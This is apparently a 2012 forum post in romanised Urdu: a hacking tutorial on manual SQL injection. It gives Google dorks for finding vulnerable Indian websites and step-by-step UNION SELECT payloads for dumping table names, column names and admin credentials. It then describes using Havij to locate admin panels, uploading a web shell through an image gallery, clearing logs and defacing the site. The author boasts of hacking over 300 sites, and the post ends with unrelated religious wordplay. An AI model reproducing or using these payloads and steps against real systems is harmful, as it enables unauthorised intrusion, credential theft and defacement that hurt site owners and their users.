%%%%%%%%%%%%%%%%%%%%%%% AsSalamoalaiKuM All PCA %%%%%%%%%%%%%%%%%%%%%5
[+][+][+][+] SQL InjecTion In urdU :P [+][+][+][+][+]
[+][+][+] Sab Se Pehele Aap download KAren!
[+] FireFox!
[+] HackBar
[+] havij for finding Admin Panel
[+] 1 or 2 Vulnerable Webs :P
[+][+][+][+][+][+]^^^^^^^^^^^^^^^^^^^[+][+][+][+][+][+][+]
<-= S T A R T =->
Ye Search engine Kholen!
Or Search Karen!
Special Dorks!
inurl:index.php?id=
inurlages.php?id=
inurl:images.php?id=
India Ki Vulnerable websites KEse Dhoonden?????
Apna Dork google Per Likhen
Or site:.in Aakhir Main Likhden
Example:-) inurl:images.php?id= site:.in
Ok Ab TayyAr hoajyen :*
hamain Kya Dhoondna hai???
Vulnerable web
Tables
Column
Admin PAnel And shell UPloading
Defacing :P
Ok To Ye Hai ApnI VulneRable Web!
Kese check KAren ye Site vulnerable hai?? bus Ye Vuln web K End Main Lagayen!
Example:-)
http://www.vuln.in/index.php?id=15 Aise
http://www.vuln.in/index.php?id=15 Order by 1
Simple page
http://www.vuln.in/index.php?id=15 Order by 2
Simple Page
http://www.vuln.in/index.php?id=15 Order by 3
Simeple page
http://www.vuln.in/index.php?id=15 Order by 4
Simple Page
http://www.vuln.in/index.php?id=15 Order by 5
Simple Page
http://www.vuln.in/index.php?id=15 Order by 6
1 errorr Aagaya Unknown Column in order To Clause "6"
Iska Matlb http://www.vuln.in/index.php?id=15 Per Sirf 5 hi Columns hain
Ab Union Select Waala Method Start :-)
union Find Karne Se Pehele Vuln Web Ki Value Per - Lagaden !
Example :-)
http://www.vuln.in/index.php?id=-15 Aise
Or Ab Vulnerable column Find KAren!
http://www.vuln.in/index.php?id=-15 Union Select 1,2,3,4,5 vuln web per sirf 5 Columns the!
Phir Kuch Numbers Screen Per Aajeynge Jese 2 3 etc....!
Jo Sub Se Zyada Dark Or Bold Ho Wo Sab Se Zyada Vulnerable hai!
Sochen 2 Sab Se Zyada Dark Or Bold hai!
Ab Tables Found KArne Waal Method Start :-)
Table Found KArne K Liye Sab Se Zyada Dark Or Bold Number "2" Ko Hatake !
ye Likhen group_concat(table_name) or Phir Aakhir main from information_schema.tables where table_schema= database ()--
Example:-)
http://www.vuln.in/index.php?id=-15 union Select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema= database ()--
Aise Likhna Hai 2 Ki Jaga Per
So ye hamain Table DedeGa magar Dihaan rahe Sab Kuch Theek Likeyega warna My_sql Fetch error Aajayega!
Like:-) admin,user,post,contacts,timing,gallery, etc etc...!
hamain chahiye Admin Table ! Ab Apna hackBar kholeye Jo k 1 FireFox Addon hai!
Or wahan MySql Likha Hai Wahan Ja Kar CHAR Menu Kholen Or Likhen "Admin"!
Or Wo Kuch Is Tarha Char Dega CHAR(12,13,14,21,43,235,2365,21,) Ye Real nahi hai!
Ok!
ab Aapko group_concat(table_name0 Ki Jagah group_concat(column_name) Likhna hOgA :P
Or form Information_schema.tables Ki Jagah column Likhna hai Or table_schema= Ki Jagah per table_name Likhna hai :P
Example:-) http://www.vuln.in/index.php?id=-15 union Select 1,group_concat(column_name)3,4,5 from information_schema.columns where table_name= ChaR (1,2,13,1,3,2142,354,234,)
Ab Column FindinG <Method>
Ab aapko Apni vulnerable Web k aage Ye Karna hai Jo neeche hai
http://www.vuln.in/index.php?id=-15 union Select 1,group_concat(column_name)3,4,5 from information_schema.columns where table_name= ChaR (1,2,13,1,3,2142,354,234,)
Done
to Phir Ye aapko Kuch Istarha Dega
logs,username,password,date etc etc hamain username and Password Chahiye!
ab Passwor dKese nikaalen??? Neeche hai sab Kuch
http://www.vuln.in/index.php?id=-15 1,group_concat(username,0x3a,Password) from admin
Or Pass Aapka
90% Times Pass Encrypted Hota Hai Like MD5,MD2,SHa=1 etc etc!
To Isse Decrypt Karna Parta hai ! Maine 300 se zyada Web Hack Ki Lekin Decrypted Pass Or Admin panel nahi mila hahahaha!
Ok Ab PAna havij Open KAren Or usmain Apni vuln Link daalen Aise !
http://www.vuln.in/
Sirf Address Daalen Phir Find Admin Per CLick KAren!
http://www.vuln.in/admin
http://www.vuln.in/administrator
http://www.vuln.in/controlpanel
http://www.vuln.in/kpanel etc etc!
Ab http://www.vuln.in/admin Open KAren!
Or username And Pass Daalen!
Or aB Aap Web main hain :P
ab Ager chahen To Shell UPload KAr Sakte hain !
Ager Apne Logs Clear Karna Chahte hain To KArna Parega xD
Phir Uploading Option dhoonden !
Gallery Main images upload Is Best for uploading Shell :X
Ab Aap Apna Shell uPload KAren or deface Karden :P
Note:-) Ager Koi Problem hai To Poochlen xC><)
MASTERS Said "" Do it manual to Bec0me BeTTeR SQL injecTor :P ""
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]HeXCoN[*][*][*][*][*][*][*][*][*][*][*]
RATE IT IF YOU LIKE THANKS
This post was last modified: 02-28-2012 10:40 PM by 1llusion
kehte hain k dill mein Allah rehta hai,
Kia ye such hai?
Chalein dill ko khol k dekhte hain
dill
d_ill
d_i_ll
d_i_l l
d__i__l l
SUBHAN Allah.
co.cc
0 komentar:
Posting Komentar